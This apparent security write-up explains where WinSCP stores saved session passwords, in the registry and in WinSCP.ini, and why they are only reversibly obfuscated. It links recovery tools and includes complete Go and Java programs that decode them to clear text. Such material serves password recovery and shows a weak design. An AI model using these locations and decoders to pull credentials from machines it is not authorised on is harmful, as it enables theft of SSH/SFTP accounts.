Obtaining and decrypting WinSCP passwords
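By default, WinSCP saves the user's password under the following registry key:
HKEY_USERS\SID\Software\Martin Prikryl\WinSCP 2\Sessions\
The stored value is only obfuscated with a fixed, reversible scheme keyed on the username and hostname, not encrypted, so a saved session is protected only if a WinSCP master password is set or no password is saved at all.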
However, on Windows 7/8, the default WinSCP.ini path is:
C:\Users\USERNAME\AppData\Local\VirtualStore\Program Files (x86)\WinSCP.ini (64-bit operating system)
C:\Program Files (x86)\WinSCP.ini (64-bit operating system)
C:\Users\USERNAME\AppData\Local\VirtualStore\Program Files\WinSCP.ini (32-bit operating system)
C:\Program Files\WinSCP.ini (32-bit operating system)
This is the earliest tool we remember:
https://bitbucket.org/knarf/winscppwd/overview/
The source code and a compiled program can be downloaded from:
https://bitbucket.org/knarf/winscppwd/downloads/winscppwd.exe
There is also a Go implementation:
https://github.com/anoopengineer/winscppasswd/blob/master/main.go
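// WinSCP stored-password recovery, Go version.
//
// The value WinSCP keeps in a session's Password field is obfuscated, not
// encrypted: every byte is complemented and XOR-ed with the fixed constant
// PW_MAGIC, and the only "key" is username+hostname, which is stored next to
// it. Anyone who can read the session store can therefore reverse it.
package main

import (
	"fmt"
	"os"
	"runtime"
	"strconv"
)

const (
	// PW_MAGIC is the fixed XOR constant of the obfuscation scheme.
	PW_MAGIC = 0xA3
	// PW_FLAG marks the format in which username+hostname is prepended to
	// the password before obfuscation.
	PW_FLAG = 0xFF
)

// main prints the recovered password for the host, username and stored
// password string given on the command line, or a usage text when the
// argument count is wrong.
func main() {
	args := os.Args[1:]
	if len(args) != 3 {
		fmt.Println("WinSCP stored password finder")
		fmt.Println("Open regedit and navigate to [HKEY_CURRENT_USER\\Software\\Martin Prikryl\\WinSCP 2\\Sessions] to get the hostname, username and encrypted password")
		fmt.Println()
		if runtime.GOOS == "windows" {
			fmt.Println("Usage winscppasswd.exe <host> <username> <encrypted_password>")
		} else {
			fmt.Println("Usage ./winscppasswd <host> <username> <encrypted_password>")
		}
		return
	}
	fmt.Println(decrypt(args[0], args[1], args[2]))
}

// decrypt reverses the obfuscation of a stored WinSCP password.
//
// password is the hex string from the session store; host and username are
// the values of the same session. The result is the clear-text password, or
// "" when the input is not valid hex, is truncated, or (in the PW_FLAG
// format) does not start with username+host.
func decrypt(host, username, password string) string {
	key := username + host

	// One hex digit per element; dec_next_char consumes them in pairs.
	passbytes := make([]byte, 0, len(password))
	for i := 0; i < len(password); i++ {
		val, err := strconv.ParseInt(string(password[i]), 16, 8)
		if err != nil {
			return ""
		}
		passbytes = append(passbytes, byte(val))
	}
	if len(passbytes)%2 != 0 {
		return ""
	}

	var flag, length byte
	flag, passbytes = dec_next_char(passbytes)
	if flag == PW_FLAG {
		// Flagged format: one dummy byte, then the real length.
		_, passbytes = dec_next_char(passbytes)
		length, passbytes = dec_next_char(passbytes)
	} else {
		length = flag
	}

	// The next byte gives the number of padding bytes to skip. Widen to int
	// before doubling (byte arithmetic would wrap at 128) and bounds-check so
	// malformed input cannot cause a slice panic.
	var toBeDeleted byte
	toBeDeleted, passbytes = dec_next_char(passbytes)
	skip := int(toBeDeleted) * 2
	if skip > len(passbytes) || int(length)*2 > len(passbytes)-skip {
		return ""
	}
	passbytes = passbytes[skip:]

	clearpass := ""
	for i := 0; i < int(length); i++ {
		var val byte
		val, passbytes = dec_next_char(passbytes)
		clearpass += string(rune(val))
	}

	if flag == PW_FLAG {
		// The clear text must begin with username+host; anything else means
		// the value does not belong to this session.
		if len(clearpass) < len(key) || clearpass[:len(key)] != key {
			return ""
		}
		clearpass = clearpass[len(key):]
	}
	return clearpass
}

// dec_next_char decodes one byte from the first two hex digits of passbytes
// and returns it together with the remaining digits. It returns 0 and the
// unchanged slice when fewer than two digits are left.
func dec_next_char(passbytes []byte) (byte, []byte) {
	if len(passbytes) < 2 {
		return 0, passbytes
	}
	a := passbytes[0]
	b := passbytes[1]
	passbytes = passbytes[2:]
	return ^(((a << 4) + b) ^ PW_MAGIC) & 0xff, passbytes
}

// A Java version is also attached: https://github.com/YuriMB/WinSCP-Password-Recovery/blob/master/src/main/java/Main.java

import java.util.ArrayList;
import java.util.List;

/**
 * Recovers a stored WinSCP password from hostname, username and the
 * obfuscated hex string of the same session. The scheme is a fixed,
 * reversible transformation, not encryption.
 *
 * Created by Yuri Meiburg on 30-4-2015.
 */
public class Main {

    /**
     * ./core/Security.h: #define PWALG_SIMPLE_FLAG 0xFF
     */
    public static final int PWALG_SIMPLE_FLAG = 0xFF;

    /**
     * ./core/Security.h: #define PWALG_SIMPLE_MAGIC 0xA3
     */
    public static final char PWALG_SIMPLE_MAGIC = 0xA3;

    // One hex digit (0..15) of the stored password per element.
    public static List<Character> fPassword = new ArrayList<Character>();
    public static String hostname, username;

    /**
     * Expects three arguments: hostname, username, stored password (hex).
     * Exits with status 0 when the argument count is wrong.
     */
    public static void main(String[] args) {
        if (args.length != 3) {
            System.err.println("Usage: Main <hostname> <username> <encrypted_password>");
            System.exit(0);
        }

        hostname = args[0];
        username = args[1];

        for (int i = 0; i < args[2].length(); ++i) {
            fPassword.add((char) Integer.parseInt("" + args[2].charAt(i), 16));
        }

        System.out.println("username = " + username);
        System.out.println("hostname = " + hostname);
        System.out.println("getPassword() = " + getPassword());
    }

    /**
     * UnicodeString __fastcall TSessionData::GetPassword() const
     * {
     *   return DecryptPassword(FPassword, UserName + HostName);
     * }
     */
    static String getPassword() {
        return decryptPassword(fPassword, username + hostname);
    }

    /**
     * Java port of the WinSCP routine quoted below.
     *
     * UnicodeString DecryptPassword(RawByteString Password, UnicodeString UnicodeKey, Integer)
     * {
     *   UTF8String Key = UnicodeKey;
     *   UTF8String Result("");
     *   Integer Index;
     *   unsigned char Length, Flag;
     *
     *   Flag = simpleDecryptNextChar(Password);
     *   if (Flag == PWALG_SIMPLE_FLAG)
     *   {
     *     simpleDecryptNextChar(Password);
     *     Length = simpleDecryptNextChar(Password);
     *   }
     *   else Length = Flag;
     *   Password.Delete(1, ((Integer)simpleDecryptNextChar(Password)) * 2);
     *   for (Index = 0; Index < Length; Index++)
     *     Result += (char)simpleDecryptNextChar(Password);
     *   if (Flag == PWALG_SIMPLE_FLAG)
     *   {
     *     if (Result.SubString(1, Key.Length()) != Key) Result = "";
     *     else Result.Delete(1, Key.Length());
     *   }
     *   return UnicodeString(Result);
     * }
     *
     * @param password   hex digits of the stored password; consumed by this call
     * @param unicodeKey username + hostname of the session
     * @return the clear-text password, or "" when the decoded text does not
     *         start with the key in the flagged format
     */
    static String decryptPassword(List<Character> password, String unicodeKey) {
        // NOTE(review): the debug output below prints the key and the
        // recovered text to stdout; kept as in the original listing.
        System.out.println("unicodeKey = " + unicodeKey);
        String key = unicodeKey;
        String result = "";
        char length, flag;

        flag = simpleDecryptNextChar(password);
        System.out.println("flag = " + (int) flag);
        if (flag == PWALG_SIMPLE_FLAG) {
            /* Dummy = */ simpleDecryptNextChar(password);
            length = simpleDecryptNextChar(password);
        } else {
            length = flag;
        }
        System.out.println("length = " + (int) length);

        int newStart = ((int) simpleDecryptNextChar(password) * 2);
        System.out.println("newStart = " + newStart + ", password.size() = " + password.size());
        removeItems(password, 0, newStart);

        for (int index = 0; index < length; ++index) {
            result += simpleDecryptNextChar(password);
        }
        System.out.println("result = " + result);

        if (flag == PWALG_SIMPLE_FLAG) {
            // startsWith avoids the StringIndexOutOfBoundsException that
            // substring(0, key.length()) throws when result is shorter than key.
            if (!result.startsWith(key)) {
                result = "";
            } else {
                result = result.substring(key.length());
            }
        }
        return result;
    }

    /**
     * Java port of the WinSCP routine quoted below.
     *
     * unsigned char simpleDecryptNextChar(RawByteString &Str)
     * {
     *   if (Str.Length() > 0)
     *   {
     *     unsigned char Result = (unsigned char)
     *       ~((((PWALG_SIMPLE_STRING.Pos(Str.c_str()[0]) - 1) << 4) +
     *          ((PWALG_SIMPLE_STRING.Pos(Str.c_str()[1]) - 1) << 0)) ^ PWALG_SIMPLE_MAGIC);
     *     Str.Delete(1, 2);
     *     return Result;
     *   }
     *   else return 0x00;
     * }
     *
     * @param str remaining hex digits; the first two are removed on success
     * @return the decoded byte, or 0x00 when fewer than two digits remain
     */
    static public char simpleDecryptNextChar(List<Character> str) {
        // Two digits are read below, so require two (the original checked > 0
        // and threw IndexOutOfBoundsException on an odd-length input).
        if (str.size() >= 2) {
            char result = unsignedChar(
                    ~(
                        (
                            unsignedChar(str.get(0) << 4) + str.get(1) // Remove bitshift overflow bits.
                        ) ^ PWALG_SIMPLE_MAGIC
                    )
            );
            removeItems(str, 0, 2);
            return result;
        } else {
            return 0x00;
        }
    }

    /**
     * Cut off anything over 255.
     *
     * @param v value to truncate
     * @return the low eight bits of v
     */
    static char unsignedChar(int v) {
        return (char) (v & 0xFF);
    }

    /**
     * Remove (end - start) items from the list, beginning at index start.
     * Stops early when the list runs out instead of throwing.
     */
    static void removeItems(List<?> lst, int start, int end) {
        for (int i = 0; i < end - start && start < lst.size(); ++i) {
            lst.remove(start);
        }
    }
}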